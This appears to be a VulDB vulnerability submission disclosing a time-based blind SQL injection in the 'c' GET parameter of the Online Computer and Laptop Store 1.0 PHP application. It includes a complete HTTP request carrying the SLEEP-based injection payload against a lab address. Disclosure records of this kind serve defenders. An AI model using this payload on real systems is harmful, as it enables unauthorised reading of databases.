| Title | Online Computer and Laptop Store V1.0 /php-ocls/?c=*&p=products GET parameter 'c' exists SQL injection vulnerability. |
|---|
| Description | In the Online Computer and Laptop Store system, I discovered a serious vulnerability where SQL injection vulnerabilities exist through get requests, allowing for direct reading of all database files.
###
GET /php-ocls/?c=%27%20AND%20(SELECT%202078%20FROM%20(SELECT(SLEEP(5)))pWJI)%20AND%20%27Phcl%27=%27Phcl&p=products HTTP/1.1
Host: 192.168.0.102
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:112.0esr) Gecko/20010101 Firefox/112.0esr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close |
|---|
| Source | ⚠️ https://docs.google.com/document/d/1GZt9MKB2K-nDrg0cnrnU6_z9wDd9xPE-YJbPV2Qgqg4/edit |
|---|
| User | T4y1oR_Xu (UID 45486) |
|---|
| Submission | 04/22/2023 08:45 (3 years ago) |
|---|
| Moderation | 04/22/2023 17:45 (9 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 227227 [SourceCodester Online Computer and Laptop Store 1.0 GET Parameter c/s sql injection] |
|---|
| Points | 20 |
|---|